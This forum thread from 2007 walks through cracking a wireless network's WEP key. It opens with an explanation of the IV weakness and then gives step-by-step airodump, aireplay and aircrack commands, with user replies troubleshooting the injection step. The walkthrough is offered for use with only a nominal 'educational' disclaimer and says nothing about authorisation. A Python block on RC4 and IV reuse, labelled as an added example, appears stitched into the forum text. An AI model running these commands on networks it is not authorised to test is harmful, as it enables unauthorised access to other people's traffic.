12:15 am June 14, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
[size=2][b]Cracking Wired Equivalent Privacy (WEP)[/b][/size]
WEP encrypts packets during transmission with the use of a shared key. WEP functions in four steps.
1. A 24-bit initialization vector (IV) is generated and combined with the secret shared key. This value is passed to the PRNG to produce a key stream of bits.
2. The data to be encrypted is passed to a CRC.
3. That value is XORed with the key stream.
4. The unencrypted IV is added to the ciphered data and the entire packet is transmitted.
The problem with WEP is that the IVs are not properly used. Every time a packet is encrypted it is given a unique IV; however, being only 24 bits in length, there are only 16,777,215 possible values. A wireless LAN transmitting at 11 Mbps transmits about 700 packets each second. Also, since the IVs are in plaintext, the attacker can capture the packets.
This video shows you how to crack 128 bit WEP in only 15 minutes. It is for educational reasons only of course.
[b][u]Steps:[/u][/b]
1) Set wireless card to monitor mode
ex. iwconfig wlan0 mode monitor
2) Run airodump to capture IVs
ex. airodump wlan0 /tmp/dump
3) Use aireplay to continually send copies of packets, so you can gather IVs faster
ex. aireplay -2 wlan0 (then select a packet that has the same BSSID as the wireless router you are cracking)
4) Wait! In this video I wait 13 minutes and by that time I have collected 529,340 IVs (I have cracked WEP with only 200,000 IVs but it took 9 minutes to crack.)
5) Crack the WEP password with aircrack!
ex. aircrack /tmp/dump-01.cap (the location of your airodump dump file)
With over 500,000 IVs it takes about 11 seconds to crack
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another." ~ Blaise Pascal, Pensées
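The four-step encapsulation and the IV problem described in the first post, as an added Python example (not code from the post or the video). RC4 and the CRC-32 ICV are the real WEP primitives; the key, IVs and payloads are constructed sample values, and the last function shows what an observer learns when an IV repeats.

```python
import zlib
from typing import Optional, Tuple

def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 PRNG: key-scheduling (KSA), then the output loop (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:                               # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encapsulate(shared_key: bytes, iv: bytes, data: bytes) -> bytes:
    """The four steps from the post, in order."""
    assert len(iv) == 3, "WEP IV is 24 bits"
    keystream = rc4_keystream(iv + shared_key, len(data) + 4)   # 1: IV||key seeds the PRNG
    icv = zlib.crc32(data).to_bytes(4, "little")                # 2: CRC-32 of the data
    body = bytes(p ^ k for p, k in zip(data + icv, keystream))  # 3: XOR with key stream
    return iv + body                                            # 4: IV sent in the clear

def wep_decapsulate(shared_key: bytes, frame: bytes) -> Tuple[bytes, bool]:
    """Receiver side: read the clear IV, rebuild the key stream, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    keystream = rc4_keystream(iv + shared_key, len(body))
    plain = bytes(c ^ k for c, k in zip(body, keystream))
    data, icv = plain[:-4], plain[-4:]
    return data, zlib.crc32(data).to_bytes(4, "little") == icv

def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Why the 24-bit IV space matters: the IVs are readable by anyone, and when
    two frames share one, their key streams are identical and cancel under XOR,
    leaving P1 xor P2 (plus the ICVs) without any knowledge of the shared key."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))

# Constructed sample values: a 104-bit key ("128-bit WEP") and two 16-byte payloads.
KEY = bytes.fromhex("0102030405060708090a0b0c0d")
P1 = b"GET / HTTP/1.0\r\n"
P2 = b"arp who-has 10.0"
```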

9:34 am June 18, 2007 | hyya (Newbie, posts 1)
Hi guys, great stuff in your vids. I have just downloaded a copy of Backtrack 2, but I am having problems with these commands shown here and in the vid, any suggestions?
I am not able to get airodump going :(
The CD used in the vid, was it version one of Backtrack? Were there some configurations made to it? Is there any chance to get a download of the one you used?
Thanks in advance!!!

11:51 am June 19, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
In the video we use the first Backtrack because it works better with my wireless card. I think airodump-ng is used in Backtrack 2; it's pretty much the same thing. The commands will vary by version, type of wireless card, etc. Also, I forgot to mention that you have to enable the wireless card with the [i]ifconfig [interface] up[/i] command. I think you can download older versions from their website.

2:42 pm June 29, 2007 | AnalyseR (Newbie, posts 1)
Hello people… great stuff…
I have a Sony Vaio fj3s.. is there any website with drivers for my wireless card, for Linux? Thanks…

11:02 pm July 6, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
hmm, check out Sony's website… my guess is it isn't going to work, because I have an internal Intel wireless card and it doesn't work =\ Just use a cheap USB wireless card; those work pretty well and you will be able to use it with VMware!

10:01 pm July 25, 2007 | TheGuy (Newbie, posts 2)
Does anyone know the airodump-ng command for /tmp/dump? It works with airodump but not -ng.

6:00 pm July 26, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
For airodump-ng you have to use '-w /tmp/dump'.

5:21 am July 27, 2007 | psycholozopher (Newbie, posts 1)
hey…
hmm, what is the command for putting my wifi card in monitor mode? I've got an Atheros..
and how can I enable it again.. and I'm using Vista
thxx

7:49 pm July 27, 2007 | computergeek (Newbie, posts 5)
For those of you using Backtrack 2:
1. To put your wireless card in the correct mode you must first find out what the device name is by entering the following: ifconfig. This command should report your device as being something like ra0, ath0 or something similar.
To put the card into "monitor mode" enter the following:
ifconfig 'devicename' down (press enter)
iwconfig 'devicename' mode monitor (press enter)
ifconfig 'devicename' up (press enter)
For example, I use the following three lines, pressing enter after entering each one.
ifconfig ra0 down
iwconfig ra0 mode monitor
ifconfig ra0 up
2. To start airodump-ng and capture IVs
You must first know the bssid and the essid of the AP that you want to attack.
The bssid is the MAC address of the AP, and the essid is the Network Name; you also need the channel.
You can start airodump to find out this information by entering the following command:
airodump-ng ra0
This will make airodump scan each wireless channel continuously. When you find the network that you want to attack, write down its AP MAC, channel and the Network name.
Then stop airodump by pressing ctrl + c.
Then start airodump again with the command:
airodump-ng --channel (the channel the network is on) --write (name of file you want to write to) --ivs (name of device) then press enter.
I use the following:
airodump-ng --channel 9 --write output --ivs ra0
This command tells airodump that you want to monitor channel 9, and write all captured IVs to a file called output (which will be located in the same directory you are in).
Once you have started airodump you can then inject packets or do whatever you want to create traffic and capture enough IVs that you can then crack the WEP.

7:52 pm July 27, 2007 | computergeek (Newbie, posts 5)
Note:
On the above commands, you need to use two minus signs, -- (without the space). They look like dashes on the above post.
E.g. airodump-ng --channel 9 --write output --ivs ra0

11:56 am August 5, 2007 | Alucard_Hellsing (Newbie, posts 4)
I get this error:
Error for wireless request "set mode" (8B06)
Set failed on device ath0 ; invalid argument

11:00 pm August 6, 2007 | mcro (Newbie, posts 3)
Hmm, looks like everything works for me. I followed computergeek's steps using version two.
However! When I use aireplay-ng to gen traffic, it doesn't increase the data (IVs) at all.. or very quickly.
In some cases do you need a second NIC for this operation?
LMK. Thanks. :)

2:18 am August 7, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
Does the new aireplay-ng select the packet to be repeated for you? Or is it like the old version on Backtrack 1 that asks you to choose the packet? If you have to select the packet, make sure you choose a packet that goes from the client to the server (just look at the MAC address) and make sure the MAC address isn't a broadcast MAC (FF:FF:FF:FF:FF:FF). Just keep trying different packets until the IVs increase rapidly.

9:23 am August 7, 2007 | mcro (Newbie, posts 3)
aireplay-ng does in fact select the packet and has the correct MAC address of the device which I'm trying to generate traffic to.
I've tried using auto select and I've tried doing it manually, typing in the MAC address which I want to use… neither one generates traffic and increases the IVs… sucks huh? :P
:/ Not sure, I'm thinking it may need a second wireless card to gen the traffic while the other one monitors? Might be a code flaw with some?
LMK thanks, :)

9:40 am August 7, 2007 | mcro (Newbie, posts 3)
Also, just in addition: I ran airodump-ng (without specifying a specific host, in other words logging all IVs from all current signals) and none of them were increasing rapidly, further pointing at the fact that my NIC was not generating any traffic.

3:31 pm August 7, 2007 | james9r9r (Newbie, posts 2)
Yes, well I have a laptop with a built-in wireless chip, but it's an ath0, and when I start up Backtrack I get the error when I type 'iwconfig ath0 mode monitor' in the shell Konsole?

2:44 pm August 10, 2007 | singhkhalsa (Newbie, posts 5)
Yellow Fellaz,
I'm having a bit of a problem. I had over 2 million packets. But when I tried to crack the code, BT2 gave me a message saying not enough WEP packets read. In the packet injection window, I had 4 million packets sent, 2 million ARPs, and 2 million packets read. What am I doing wrong? How do I make it read more packets? Can someone shine some light on that? Thanks.

6:49 pm August 10, 2007 | Patchy (Admin, Champaign, IL, posts 1648)
@mcro and singhkhalsa: Seems that you both are having the same problem with Backtrack 2. I have never tried to crack WEP with BT2; why don't you guys try using Backtrack 1 final, that's what is used in the video.
@james9r9r: My internal Intel chipset wireless card doesn't work with Backtrack. Backtrack sees the card but doesn't recognize it as a wireless card, so your best bet would be to buy a cheap wireless USB card (I like the Linksys brand).